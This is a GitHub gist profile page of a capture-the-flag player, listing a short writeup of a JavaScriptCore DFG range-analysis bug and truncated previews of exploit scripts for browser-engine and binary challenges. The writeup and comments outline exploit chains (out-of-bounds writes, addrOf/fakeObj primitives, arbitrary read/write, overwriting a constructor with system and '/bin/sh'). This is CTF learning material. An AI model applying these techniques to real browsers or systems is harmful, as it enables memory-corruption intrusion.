Skip to content

Instantly share code, notes, and snippets.

View dkdna's full-sized avatar
🚩
Capturing flags

Anand Balaji dkdna

🚩
Capturing flags
  • Austin, TX
View GitHub Profile
@dkdna
dkdna / writeup.md
Created January 22, 2023 10:27
bi0sCTF 2022 - b3typer

Short Writeup

  • Simple typer bug, range of BitAnd opcode is assumed to be [1, operand] when in reality it is [0, operand].
  • Use range assumptions to create unchecked integer underflow.
  • Bypass array bounds checks and obtain OOB write, overwrite size of array to get overlap.
  • Use double & object array overlap to create addrOf & fakeObj primitives.
  • Create overlapping fake array using StructureID leak to obtain arbitrary R/W.

The trick here is to convert a checkedAdd node to a normal Add node due to the incorrect range, and cause an unchecked integer underflow. When there is no underflow check, you can cause DFGIntegerRangeOptimization to make incorrect assumptions about bounds, and subsquently remove bounds checks (More details in the comments of the exploit).

@dkdna
dkdna / exp.js
Created November 29, 2022 19:19
HITCON CTF 2022 - Fourchain Browser
let ab = new ArrayBuffer(8);
let f64a = new Float64Array(ab);
let u64a = new BigUint64Array(ab);
function f2i(v) {
f64a[0] = v;
return u64a[0];
}
function i2f(v) {
u64a[0] = v;
return f64a[0];
@dkdna
dkdna / exp.js
Created October 16, 2022 03:46
ASIS Quals 2022 - jsy
/*
tl;dr:
Double free an object (a), cause a JsObject (d) to overlap with a non-sparse array (c)
Use this to read addresses as strings, convert back to integers
Use shrstr in JsValue to overwrite array pointer for arbitrary r/w
*/
function hex(x) {
return "0x" + x.toString(16)
}
@dkdna
dkdna / exp.py
Created December 12, 2021 09:04
SECCON - pyast64
def tmp():
new = 0x4eb9059
new = 0x4eb9054
new = 0x4eb905f
new = 0x4eb006a
new = 0x4eb905e
new = 0x4eb3b6a
new = 0x4eb9058
new = 0x4eb006a
@dkdna
dkdna / exp.js
Created August 26, 2021 11:10
CoRCTF - outfoxed
var tmp_buf = new ArrayBuffer(8)
var f64 = new Float64Array(tmp_buf)
var u32 = new Uint32Array(tmp_buf)
var BASE = 0x100000000
function f2i(f) {
f64[0] = f
return u32[0] + BASE*u32[1]
}
function i2f(i) {
@dkdna
dkdna / exp.js
Created August 26, 2021 11:08
starCTF 2019 - oob-v8
var tmp_buf = new ArrayBuffer(8)
var f64 = new Float64Array(tmp_buf)
var u32 = new Uint32Array(tmp_buf)
var BASE = 0x100000000
function f2i(f) {
f64[0] = f
return u32[0] + BASE*u32[1]
}
function i2f(i) {
@dkdna
dkdna / exp.js
Created August 15, 2021 13:42
inCTFi 2021 - DeadlyFastGraph
// tl;dr : arbitrary type confusion by removing a CheckStructure node
// Full writeup coming soon :)
var tmp_buf = new ArrayBuffer(8)
var f64 = new Float64Array(tmp_buf)
var u32 = new Uint32Array(tmp_buf)
var BASE = 0x100000000
function f2i(f) {
f64[0] = f
@dkdna
dkdna / exp1.js
Last active August 8, 2021 12:44
zh3r0 ctf - jsfordummies
/*
Bug: typecasting uint8_t* ab.backingStore to uint16_t* ta.mem while converting ArrayBuffer to Uint16Array,
but not reducing length, allows oob r/w.
Exploit: create ArrayBuffer of same size as JSObject, so that they come consecutively in memory,
use oob r/w to overwrite JSObject metadata, construct arbitrary r/w primitives, overwrite
Array constructor with system, JSState with "/bin/sh"
*/
test = new ArrayBuffer(0x70);
@dkdna
dkdna / exp.py
Last active April 19, 2021 12:11
plaidctf - liars
#!/usr/bin/python
from pwn import *
import sys
import ctypes
from ctypes import *
remote_ip, port = 'liars.pwni.ng', 2018
binary = './liarmod'
brkpts = '''
@dkdna
dkdna / exp.py
Last active April 20, 2021 17:23
midnightsunquals - shapes
#!/usr/bin/python3
from pwn import *
import sys
remote_ip, port = 'shapes-01.play.midnightsunctf.se', 1111
binary = './chall'
brkpts = '''
'''